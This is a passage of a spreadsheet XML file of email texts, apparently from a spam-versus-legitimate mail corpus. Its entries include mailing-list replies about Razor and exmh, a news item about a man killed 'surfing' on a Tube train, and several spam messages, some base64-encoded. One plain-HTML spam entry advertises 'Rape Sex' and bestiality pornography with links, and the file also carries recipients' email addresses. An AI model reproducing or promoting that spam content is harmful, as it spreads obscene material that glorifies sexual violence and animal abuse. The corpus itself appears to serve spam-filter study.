 &lt;br&gt;and old address to &lt;a href="mailto:Moderator@AEOpublishing.com"&gt;Moderator@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;See below for unsubscribe instructions.
 &lt;p&gt;Copyright 2001 AEOpublishing
 &lt;p&gt;----- End of Your Membership Exchange
 		&lt;!-- End Letter Body --&gt;
 		&lt;!-- Begin Signature  --&gt;
 		&lt;p&gt;
 		&lt;p&gt;
 		&lt;br&gt;
 		&lt;hr width="60%" size="1" align="left" NOSHADE&gt;
 		&lt;br&gt;
 		&lt;!-- End Signature  --&gt;
 		&lt;/font&gt;
 		&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;!-- End Content Table --&gt;
 	&lt;/td&gt;
 	&lt;td width="25" bgcolor="#870000"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- Begin Phone Number Row --&gt;
 &lt;tr&gt;
 	&lt;td width="25" bgcolor="#870000"&gt;&lt;/td&gt;
 	&lt;td width="525" bgcolor="#870000" align="right"&gt;&lt;font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="1" color="#FFFFFF"&gt; &lt;/font&gt;&lt;/td&gt;
 	&lt;td width="25"&gt;&lt;img src="http://ccprod.roving.com/roving/images/letters/red-corner-br.gif" width="25" height="25" border="0" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- End Phone Number Row --&gt;
 &lt;tr&gt;
 	&lt;td colspan="3" bgcolor="#FFFFFF" align="center"&gt;
 	&lt;!--  You are required by your Constant Contact user agreement to
       provide the opt-out link shown below as by the property 'OptOut' --&gt;
 	&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="1"&gt;
 	&lt;br&gt;This email was sent to jm@netnoteinc.com, at your request, by &lt;a href="http://ccprod.roving.com/roving/sa/s.jsp?id=bd7n7877.6vihnja6"&gt;Your Membership Newsletter Services&lt;/a&gt;.  
 	&lt;br&gt;Visit our Subscription Center to &lt;a href="http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.6vihnja6&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com"&gt;edit&lt;/a&gt; your interests or &lt;a href="http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.6vihnja6&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com"&gt;unsubscribe&lt;/a&gt;.
 	&lt;br&gt;View our &lt;a href="http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp"&gt;privacy policy&lt;/a&gt;.
 	&lt;p&gt;Powered by
 	&lt;br&gt;&lt;a href="http://www.constantcontact.com/index.jsp?cc=ctrlr" target="_blank"&gt;&lt;img src="http://ccprod.roving.com/roving/images/cc-logo-color-sm.gif" border="0" alt="Constant Contact"&gt;&lt;/a&gt;
 	&lt;/font&gt;
 	&lt;!-- end opt-out area --&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 --90840724.996748272348.JavaMail.RovAdmin.rovweb003--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 24 Jul 2002, Tabor J. Wells wrote:
 &gt; On Tue, Jul 23, 2002 at 09:21:58PM -0700,
 &gt; Patrick &lt;patrick@stealthgeeks.net&gt; is thought to have said:
 &gt;
 &gt; &gt; Today's error(received multiple times) was:
 &gt; &gt;
 &gt; &gt; Jul 23 21:16:39.288680 report[98557]: [ 2]  Razor-Agents v2.12 starting
 &gt; &gt; razor-report ./jobspam
 &gt; &gt; Jul 23 21:16:46.597147 report[98558]: [ 1] razor-report error: reportit:
 &gt; &gt; Error 213 while authenticating, aborting.
 &gt;
 &gt; I believe this is fixed (or at least there's a workaround in place to try
 &gt; again) in 2.125
 Thanks.
 &gt; &gt; I really like the concept of Razor but I find myself wondering if it's
 &gt; &gt; really a good idea for the developers to be passing off what appears
 &gt; &gt; to be alpha-quality software as production-ready....
 &gt;
 &gt; And where does it say production-ready? http://razor.sourceforge.net says at
 &gt; the top of the page:
 &gt;
 &gt; June 13, 2002 - Vipul's Razor v2 released! The first beta of Vipul's Razor
 &gt; v2 is now available for public download.
 &gt;
 &gt; Likewise Vipul's announcement post about v2 to this list states that it is
 &gt; beta in the first sentence.
 I sit corrected. I guess we could argue if it's even beta quality(I'd say
 I have about a 50/50 chance of reports being submitted), but I
 don't think that would be productive. :-)
 /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
                                Patrick Greenwell
          Asking the wrong questions is the leading cause of wrong answers
 \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Surfing the tube
</t>
  </si>
  <si>
    <t xml:space="preserve">Man killed 'trying to surf' on Tube train 
 Ananova 
 Wednesday December 4, 2002 11:07 AM
 An investigation has been launched into the death of a passenger who tried
 to "surf" on a Tube train.
 The passenger, a man in his mid 20s, died in the incident at Chalk Farm
 station on the Northern Line on Monday night.
 Witnesses have reported seeing the man trying to hang on to the train as it
 left the north London station.
 There is also a suggestion that he may have been waving at friends in the
 train.
 The man died when he struck the wall at the beginning of the tunnel at the
 end of the platform.
 "We think he may have been trying to jump on to the side of the train. It's
 not quite clear what happened," said a London Underground spokeswoman.
 The incident was being investigated by both LU and British Transport Police,
 who today described the death as "non-suspicious." 
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Want to go on a date?
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00B3_51A40A1A.A7486A51
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEg
 VHJhbnNpdGlvbmFsLy9FTiI+DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPkFk
 dWx0IENsYXNzaWZpZWQgMmsyPC90aXRsZT4NCjxtZXRhIGh0dHAtZXF1aXY9
 IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWlz
 by04ODU5LTEiPg0KPC9oZWFkPg0KDQo8Ym9keSBiZ2NvbG9yPSIjRkZGRkZG
 IiBsaW5rPSIjQ0M5OTk5IiBsZWZ0bWFyZ2luPSIwIiB0b3BtYXJnaW49IjAi
 IG1hcmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiPg0KDQo8Y2VudGVy
 Pg0KICA8YnI+DQogIDx0YWJsZSB3aWR0aD0iNjAwIiBib3JkZXI9IjAiIGNl
 bGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMSI+DQogICAgPHRyPg0KICAg
 ICAgPHRkIGJnY29sb3I9IiM5OTAwMDAiPjx0YWJsZSB3aWR0aD0iNjAwIiBi
 b3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCI+DQog
 ICAgICAgICAgPHRyPg0KICAgICAgICAgICAgPHRkIGJnY29sb3I9IiNGRkZG
 RkYiPg0KICAgICAgICAgIA0KICAgICAgICAgIDxkaXYgYWxpZ249InJpZ2h0
 Ij48aW1nIHNyYz0iaHR0cDovL3d3dy54eHhtYXRjaC5uZXQvbG9nby5qcGci
 IHdpZHRoPSI2MDAiIGhlaWdodD0iNjUiPjxicj4NCiAgICAgICAgICA8Yj48
 Zm9udCBjb2xvcj0iI0NDMDAzMyIgc2l6ZT0iMiIgZmFjZT0iR2VuZXZhLCBB
 cmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj4tLS0gVGhlIG1vc3QgY29t
 cHJlaGVuc2l2ZSBhZHVsdCBtYXRjaCBtYWtpbmcgc2VydmljZTxicj4NCiAg
 ICAgICAgICA8YnI+DQogICAgICAgICAgICAgICAgICAgIDwvZm9udD48L2I+
 DQo8L2Rpdj48L3RkPg0KICAgICAgICAgIDwvdHI+DQogICAgICAgICAgPHRy
 Pg0KICAgICAgICAgICAgPHRkIGJnY29sb3I9IiNGRkZGRkYiPjxjZW50ZXI+
 DQogICAgICAgICAgICAgICAgPHRhYmxlIHdpZHRoPSI0MDAiIGJvcmRlcj0i
 MCIgY2VsbHNwYWNpbmc9IjMiIGNlbGxwYWRkaW5nPSIxIj4NCiAgICAgICAg
 ICAgICAgICAgIDx0ciBiZ2NvbG9yPSIjOTkwMDAwIj4NCiAgICAgICAgICAg
 ICAgICAgICAgPHRkIHdpZHRoPSIxMDAiPjxpbWcgc3JjPSJodHRwOi8vd3d3
 Lnh4eG1hdGNoLm5ldC9mcm9udHBpYy00LmdpZiIgd2lkdGg9IjEwMCIgaGVp
 Z2h0PSIxNTAiPjwvdGQ+DQogICAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0
 aD0iMTAwIj48aW1nIHNyYz0iaHR0cDovL3d3dy54eHhtYXRjaC5uZXQvZnJv
 bnRwaWNtLTIuZ2lmIiB3aWR0aD0iMTAwIiBoZWlnaHQ9IjE1MCI+PC90ZD4N
 CiAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSIxMDAiPjxpbWcgc3Jj
 PSJodHRwOi8vd3d3Lnh4eG1hdGNoLm5ldC9mcm9udHBpYy0yLmdpZiIgd2lk
 dGg9IjEwMCIgaGVpZ2h0PSIxNTAiPjwvdGQ+DQogICAgICAgICAgICAgICAg
 ICAgIDx0ZCB3aWR0aD0iMTAwIj48aW1nIHNyYz0iaHR0cDovL3d3dy54eHht
 YXRjaC5uZXQvZnJvbnRwaWNtLTEuZ2lmIiB3aWR0aD0iMTAwIiBoZWlnaHQ9
 IjE1MCI+PC90ZD4NCiAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAg
 ICAgICAgICAgPC90YWJsZT4NCiAgICAgICAgICAgICAgICA8Zm9udCBjb2xv
 cj0iIzk5MDAwMCIgc2l6ZT0iMSIgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhl
 bHZldGljYSwgc2Fucy1zZXJpZiI+Q2hlY2sgc29tZSBvZiBvdXIgIGFjdHVh
 bCBwaWN0dXJlcyBmcm9tIDxiPnJlYWw8L2I+IG1lbWJlcnMhPC9mb250Pjxi
 cj4NCiAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjQyMCIgYm9yZGVy
 PSIwIiBjZWxsc3BhY2luZz0iMyIgY2VsbHBhZGRpbmc9IjEiPg0KICAgICAg
 ICAgICAgICAgICAgPHRyPg0KICAgICAgICAgICAgICAgICAgICA8dGQ+PGNl
 bnRlcj4NCiAgICAgICAgICAgICAgICAgIDxmb250IGNvbG9yPSIjOTkwMDAw
 IiBzaXplPSIyIiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBz
 YW5zLXNlcmlmIj48YnI+DQogICAgICAgICAgICAgICAgICA8YnI+DQogICAg
 ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2ZvbnQ+PGZvbnQg
 c2l6ZT0iMiIgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fu
 cy1zZXJpZiI+PC9mb250Pjxmb250IGNvbG9yPSIjOTkwMDAwIiBzaXplPSIy
 IiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
 Ij48Yj5XZWxjb21lPC9iPiB0byBvbmUgb2YgdGhlIEludGVybmV0J3MgcHJl
 bWllciBhZHVsdCBtYXRjaCBtYWtpbmcgc2VydmljZXMgd2hlcmUgcGVvcGxl
 IGp1c3QgbGlrZSB5b3Vyc2VsZiBjYW4gdmlldyBhbmQgcGxhY2UgcGVyc29u
 YWwgYWR2ZXJ0aXNlbWVudHMgd2hpY2ggYXJlIHZpZXdlZCBieSB0aG91c2Fu
 ZHMgZGFpbHkhDQo8YnI+DQogICAgICAgICAgICAgICAgICA8YnI+DQogICAg
 ICAgICAgICAgICAgICA8L2ZvbnQ+DQogICAgICAgICAgICAgICAgICAgICAg
 PC9jZW50ZXI+DQogICAgICAgICAgICAgICAgICAgICAgPGNlbnRlcj4NCiAg
 ICAgICAgICAgICAgICAgIDxmb250IGNvbG9yPSIjOTkwMDAwIiBzaXplPSIy
 IiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
 Ij4NCiAgICAgICAgICAgICAgICBXZWIgQWR1bHQgQ2xhc3NpZmllZHMgaGFz
 IHRob3VzYW5kcyBvZiBhZHMgLSBzb21ldGhpbmcgZm9yIGV2ZXJ5b25lLCBt
 YWxlIG9yIGZlbG1hbGUhIA0KICAgICAgICAgICAgICAgIDwvZm9udD4NCiAg
 ICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgIDxmb250IGNvbG9y
 PSIjOTkwMDAwIiBzaXplPSIyIiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVs
 dmV0aWNhLCBzYW5zLXNlcmlmIj48YnI+DQogICAgICAgICAgICAgICAgICA8
 YnI+DQogICAgICAgICAgICAgICAgICA8L2ZvbnQ+PGZvbnQgc2l6ZT0iMiIg
 ZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+
 DQogICAgICAgICAgICAgICAgICA8YnI+DQogICAgICAgICAgICAgICAgICA8
 aW1nIHNyYz0iaHR0cDovL3d3dy54eHhtYXRjaC5uZXQvaGVhcnQuZ2lmIiB3
 aWR0aD0iMTUiIGhlaWdodD0iMTMiPiZuYnNwOyAgICAgICAgICAgICAgICAg
 IA0KICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iaHR0cDovL3d3dy54eHht
 YXRjaC5uZXQvdmVyaWZ5Lmh0bSI+PGI+Q2xpY2sgaGVyZSB0byBiZSBjb252
 aW5jZWQ8L2I+PC9hPiZuYnNwOyZuYnNwOzxpbWcgc3JjPSJodHRwOi8vd3d3
 Lnh4eG1hdGNoLm5ldC9oZWFydC5naWYiIHdpZHRoPSIxNSIgaGVpZ2h0PSIx
 MyI+PGJyPg0KICAgICAgICAgICAgICAgICAgPGZvbnQgY29sb3I9IiM5OTAw
 MDAiIHNpemU9IjEiPjxiPih3aWxsIG9wZW4gaW4gYSBuZXcgd2luZG93IGZv
 ciB5b3VyIGNvbnZlbmllbmNlKTwvYj48L2ZvbnQ+PC9mb250Pjxicj4NCiAg
 ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2NlbnRlcj48L3Rk
 Pg0KICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICA8
 L3RhYmxlPg0KICAgICAgICAgICAgICAgIDxicj4NCiAgICAgICAgPC9jZW50
 ZXI+PC90ZD4NCiAgICAgICAgICA8L3RyPg0KICA8L3RhYmxlPjwvdGQ+DQog
 ICAgPC90cj4NCiAgPC90YWJsZT4NCiAgDQogIDx0YWJsZSB3aWR0aD0iNjAw
 IiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCI+
 DQogICAgPHRyPg0KICAgICAgPHRkPjxkaXYgYWxpZ249InJpZ2h0Ij48Zm9u
 dCBzaXplPSIxIiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBz
 YW5zLXNlcmlmIj48Yj4mY29weTtYeHhNYXRjaC5uZXQgMjAwMjwvYj48L2Zv
 bnQ+DQo8L2Rpdj48L3RkPg0KICAgIDwvdHI+DQogIDwvdGFibGU+DQogIDxi
 cj4NCjwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0KDQozNzQwb3hkdTYt
 MzMyeUlsZTg5MjlFQXRMNS1sMjU=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ()Ż!!..Ÿ  ý
</t>
  </si>
  <si>
    <t xml:space="preserve">PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9u
 YWwvL0VOIj4NCjwhLS0gc2F2ZWQgZnJvbSB1cmw9KDAwNDIpZmlsZTovL1xcUzktZ3Utbm90
 ZWJvb2tcdGVtcFxtYXJrZXRpbmcuaHRtIC0tPg0KPEhUTUw+PEhFQUQ+PFRJVExFPsDPud0g
 xMTHu8XNIL/4sMW4riCwqL3DIL3DvbrF2zwvVElUTEU+DQo8TUVUQSBodHRwLWVxdWl2PUNv
 bnRlbnQtVHlwZSBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9a3NfY181NjAxLTE5ODci
 Pg0KPE1FVEEgY29udGVudD0iTVNIVE1MIDYuMDAuMjYwMC4wIiBuYW1lPUdFTkVSQVRPUj48
 L0hFQUQ+DQo8Qk9EWSB0ZXh0PWJsYWNrIHZMaW5rPXB1cnBsZSBhTGluaz1yZWQgbGluaz1i
 bHVlIGJnQ29sb3I9d2hpdGU+DQo8VEFCTEUgaGVpZ2h0PTI1IGNlbGxTcGFjaW5nPTAgY2Vs
 bFBhZGRpbmc9MCB3aWR0aD0iODAlIiBhbGlnbj1jZW50ZXINCmJnQ29sb3I9cmVkIGJvcmRl
 cj0wPg0KPFRCT0RZPg0KPFRSPg0KPFREIHdpZHRoPTEwNCBoZWlnaHQ9NTggcm93U3Bhbj0y
 Pg0KPFAgYWxpZ249Y2VudGVyPjxBIGhyZWY9Imh0dHA6Ly93d3cuc25pbmUuY29tLyI+PElN
 RyBhbHQ9IiIgaHNwYWNlPTANCnNyYz0iaHR0cDovL3d3dy5zbmluZS5jb20vaW5mb20vczku
 Z2lmIiBib3JkZXI9MD48L0E+PC9QPjwvVEQ+DQo8VEQgd2lkdGg9MTIwIGhlaWdodD04MiBy
 b3dTcGFuPTM+DQo8UD4mbmJzcDs8L1A+PC9URD4NCjxURCB3aWR0aD0zMDIgaGVpZ2h0PTgy
 IHJvd1NwYW49Mz4NCjxQIGFsaWduPWNlbnRlcj48Qj48Rk9OVCBjb2xvcj13aGl0ZT6/+LDF
 uK4gsKi9wyC9w726xds8QlI+tOu4rsGhILnXILX0t68mbmJzcDu48MH9DQq+yLO7PC9GT05U
 PjwvQj4mbmJzcDs8L1A+PC9URD4NCjxURCB2QWxpZ249Ym90dG9tIHdpZHRoPTI2MCBoZWln
 aHQ9MjY+DQo8UCBhbGlnbj1yaWdodD48U1BBTiBzdHlsZT0iRk9OVC1TSVpFOiAxNHB0Ij48
 Qj48Rk9OVCBjb2xvcj13aGl0ZT5EaWdpdGFsDQpTZWN1cml0eSBTb2x1dGlvbjwvRk9OVD48
 L0I+PC9TUEFOPjwvUD48L1REPjwvVFI+DQo8VFI+DQo8VEQgdkFsaWduPWNlbnRlciB3aWR0
 aD0yNjAgaGVpZ2h0PTE5Pg0KPFAgYWxpZ249cmlnaHQ+PEI+PEZPTlQgY29sb3I9d2hpdGU+
 UzkgSW5jLjwvRk9OVD48L0I+PC9QPjwvVEQ+PC9UUj4NCjxUUj4NCjxURCB3aWR0aD0xMDQg
 aGVpZ2h0PTI0Pg0KPFA+PEEgaHJlZj0iaHR0cDovL3d3dy5zbmluZS5jb20vIj48SU1HIGhl
 aWdodD0xNg0Kc3JjPSJodHRwOi8vd3d3LnNuaW5lLmNvbS9pbmZvbS9zbmluZS5naWYiIHdp
 ZHRoPTEwMCBib3JkZXI9MD48L0E+PC9QPjwvVEQ+DQo8VEQgd2lkdGg9MjYwIGhlaWdodD0y
 ND4NCjxQPiZuYnNwOzwvUD48L1REPjwvVFI+DQo8VFI+DQo8VEQNCnN0eWxlPSJCT1JERVIt
 TEVGVC1DT0xPUjogcmVkOyBCT1JERVItQk9UVE9NLUNPTE9SOiByZWQ7IEJPUkRFUi1UT1At
 U1RZTEU6IG5vbmU7IEJPUkRFUi1UT1AtQ09MT1I6IHJlZDsgQk9SREVSLVJJR0hULVNUWUxF
 OiBub25lOyBCT1JERVItTEVGVC1TVFlMRTogbm9uZTsgQk9SREVSLVJJR0hULUNPTE9SOiBy
 ZWQ7IEJPUkRFUi1CT1RUT00tU1RZTEU6IHNvbGlkIg0KdkFsaWduPWJvdHRvbSB3aWR0aD03
 ODYgYmdDb2xvcj13aGl0ZSBjb2xTcGFuPTQgaGVpZ2h0PTQ+DQo8UCBhbGlnbj1jZW50ZXI+
 PEZPTlQNCnNpemU9MT4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
 cDsmbmJzcDs8L0ZPTlQ+PC9QPjwvVEQ+PC9UUj48L1RCT0RZPjwvVEFCTEU+DQo8VEFCTEUg
 d2lkdGg9IjgwJSIgYWxpZ249Y2VudGVyIGJvcmRlcj0wPg0KPFRCT0RZPg0KPFRSPg0KPFRE
 IHdpZHRoPTk2NCBoZWlnaHQ9NDU+DQo8UD48Rk9OVCBzaXplPTI+Uzkgv6G8rbTCILzSsdS4
 8CC51yDAz7ndILjFwOW/68C4t84gsLO537XIIL/4sMW4riCwqL3DIL3DvbrF28DHIMCvxesg
 udcgvLPEobimILTjtOfHz73HILrQwLsNCrjwwf3H1bTPtNkuPC9GT05UPjwvUD48L1REPjwv
 VFI+DQo8VFI+DQo8VEQgd2lkdGg9OTY0IGhlaWdodD0zOT4NCjxQPjxGT05UIGNvbG9yPSMw
 MDAwYTA+PFNUUk9ORz69w726xdsgsLO/5DwvU1RST05HPjxCUj48L0ZPTlQ+PEZPTlQNCmNv
 bG9yPSM2NjY2NjYgc2l6ZT0yPjEuILHiwbjAxyBDQ1RWILD4u+fAxyDB1r/kILmuwabBocDO
 ILP0wLogsKGw3bTruKYgPFNUUk9ORz7Dt7TcILXwwfbF0A0Kuea9xDwvU1RST05HPsC4t84g
 wPzIr8fUwLi3zrytILzSsdS48CC4xcDlse7B9rW1ILyzxKG6zrTjx9i80i48QlI+Mi4gv/iw
 3cH2v6G8rSA8U1RST05HPsDOxc2z3cC7DQrF68fYPC9TVFJPTkc+ILjFwOXAuyDH17vzIL3H
 vcOwoyC6vCC89rChIMDWwL0uIDxTVFJPTkc+w9a06yAxNrG6taXAxyC4xcDlwLsgtb+9w7+h
 IL/4sN3B9r+hvK0NCrCovcM8L1NUUk9ORz4uPEJSPjMuIL7fsKMgxKfA1MDaILnfu/29wyA8
 U1RST05HPr+5vuDA/MitIDWxurWlt84gwNq1vyDF67q4x8+45yC9x73DsKMgx/bA5bCow7sg
 udcNCsf2wOXF68itPC9TVFJPTkc+sKEgsKG0ycfULjxCUj40LiC18MH2xdC55r3EwLi3ziDI
 rbvzwPrA5cC7IMTEx7vFzb+hIMfUwLi3ziCx4sG4wMcgPFNUUk9ORz5WaWRlbyBUYXBltMIN
 CsfKv+S++MC9PC9TVFJPTkc+LjwvRk9OVD48Rk9OVCBzaXplPTI+PEJSPjwvRk9OVD48L1A+
 PC9URD48L1RSPg0KPFRSPg0KPFREIHdpZHRoPTk2NCBoZWlnaHQ9NDQ+DQo8UD48QlI+PEZP
 TlQgY29sb3I9IzY2NjY2NiBzaXplPTI+v6m3r7/rtbXAxyC4tsTJxsPAzCCwobTJx8+45yC0
 57vnwMcgPC9GT05UPjxCPjxGT05UDQpjb2xvcj0jMzMzMzMzIHNpemU9Mj6/z7qux9EgseK8
 +sH2v/jAuLfOIL+1vve/obi4IMD8s+Q8L0ZPTlQ+PC9CPjxGT05UIGNvbG9yPSM2NjY2NjYN
 CnNpemU9Mj7Hz73HvPYgwNa9wLTPtNkuPC9GT05UPjwvUD4NCjxQPjxGT05UIGNvbG9yPSM2
 NjY2NjY+PEI+wabHsLmuwMc8L0I+IDogUzkgv7W+98bAIDAyLTY4OC04MDg4LjwvRk9OVD4g
 PEENCmhyZWY9Imh0dHA6Ly93d3cuc25pbmUuY29tLyI+aHR0cDovL3d3dy5zbmluZS5jb20v
 PC9BPiZuYnNwOyA8QQ0KaHJlZj0ibWFpbHRvOnNOaW5lQHNOaW5lLmNvbSI+c05pbmVAc05p
 bmUuY29tPC9BPjwvUD48L1REPjwvVFI+DQo8VFI+DQo8VEQgd2lkdGg9OTY0IGhlaWdodD0x
 NDI+DQo8UCBhbGlnbj1jZW50ZXI+PElNRyBzdHlsZT0iV0lEVEg6IDcwNnB4OyBIRUlHSFQ6
 IDE4OHB4IiBoZWlnaHQ9MTU1IGFsdD0iIg0KaHNwYWNlPTAgc3JjPSJodHRwOi8vd3d3LnNu
 aW5lLmNvbS9pbmZvbS9jdXN0b21lci5naWYiIHdpZHRoPTc3NiBib3JkZXI9MD48L1A+DQo8
 UCBhbGlnbj1jZW50ZXI+PEENCmhyZWY9Im1haWx0bzpyZWplY3RAc25pbmUuY29tP3N1Ympl
 Y3Q9RGVsZXRlIG15IGVtYWlsIEFkZHJlc3MhISEiPjxGT05UDQpjb2xvcj0jNjY2NjY2IHNp
 emU9MT48SU1HIHNyYz0iaHR0cDovL3d3dy5zbmluZS5jb20vaW5mb20vcmVmdXNlLmdpZiIN
 CmJvcmRlcj0wPjwvRk9OVD48L0E+PC9QPg0KPFAgYWxpZ249bGVmdD48Rk9OVCBjb2xvcj0j
 NjY2NjY2IHNpemU9MT66u7jewM/AuiDBpLq4xeu9xbjBIMDMv+vDy8H4ILnXIMGkuri6uMij
 ILXuv6EgsPzH0SC5/bf8IMGmDQo1MMG2v6EgwMewxcfRIFuxpLDtXbjewM/A1LTPtNkuPEJS
 PrTnu+e0wiBlbWFpbL/cIL7utrDH0SDBpLq4tbUgsKHB9rDtIMDWwfYgvsq9wLTPtNkuILz2
 vcXAuyC/+MShvsrAu73DILz2vcWwxbrOuKYNCrStt6/B1r3KvcO/5DwvRk9OVD48Rk9OVCBz
 aXplPTE+PEENCmhyZWY9Im1haWx0bzpyZWplY3RAc25pbmUuY29tP3N1YmplY3Q9vPa9xbDF
 us4iPjxJTUcgaGVpZ2h0PTIyDQpzcmM9Imh0dHA6Ly93d3cuc25pbmUuY29tL2luZm9tL3Jl
 amVjdC5naWYiIHdpZHRoPTgyDQpib3JkZXI9MD48L0E+PC9GT05UPjwvUD48L1REPjwvVFI+
 PC9UQk9EWT48L1RBQkxFPg0KPFA+Jm5ic3A7PC9QPjwvQk9EWT48L0hUTUw+DQo=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</si>
  <si>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Hello bevstar10  
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear bevstar10 ,
 &lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;b&gt;&lt;font color="#FF0000" size="4"&gt;Rape Sex!&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;font size="5"&gt;&lt;a href="http://explicitattraction.com/~ea/rapecentral/"&gt;CLICK HERE&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/b&gt;
 &lt;br&gt;
 =============================================================&lt;/p&gt;
 &lt;p&gt;Do you like sexy animals doing the wild thing? We have the super hot content on the Internet!&lt;br&gt;
 This is the site you have heard about. Rated the number one adult site three years in a row!&lt;br&gt;
 - Thousands of pics from hardcore fucking, and cum shots to pet on girl.&lt;br&gt;
 - Thousands videos&lt;br&gt;
 So what are you waiting for?&lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://explicitattraction.com/~ea/funfarm/"&gt;&lt;b&gt;&lt;font size="5"&gt;CLICK HERE&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;
 &lt;b&gt;YOU MUST BE AT LEAST 18 TO ENTER!&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;/p&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;/p&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;To not be on our &amp;quot;in house&amp;quot; address database&lt;br&gt;
 &lt;/font&gt;&lt;a href="http://explicitattraction.com/~ea/funfarm/takemeoff.html"&gt; &lt;font size="2"&gt;CLICK HERE&lt;/font&gt;&lt;/a&gt;&lt;font size="2"&gt; and you will eliminated from future mailings.&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [:KJ)_8J7B]
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Matthias wrote :
 &gt; For that n2, it's simple : They've been pulled out from the upstream
 &gt; xine source. I guess I should make a "xine-skins" package if there is
 &gt; enough demand for it ;-)
 Well, replying to my own post, sorry ;-)
 There is now a 1.3MB xine-skins package that includes all the available
 skins that can be found on the xine website.
 Time to "apt-get install xine-skins" for those who started to miss xinetic
 or lcd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</si>
  <si>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Re: folders moving around in the unseen window
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-1233982810P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Brent Welch &lt;welch@panasas.com&gt;
 &gt; Date:  Thu, 18 Jul 2002 08:13:53 -0700
 &gt;
 &gt; Unfortunately, an unattributed patch may or may not be a contributed patch
 &gt; as I'm not always good about recording the source of a patch.  I suspect
 &gt; this patch may have been contributed from someone that uses the
 &gt; auto-pack or auto-sort features, which I don't use.  This change should be
 &gt; tested against those features.
 I'm running with autosort right now.  If I don't see any problems, I' run with 
 autopack for a while.
 I did find some stuff that was being called too many times when auto-sort was
 enabled, but otherwise it seems to be working.
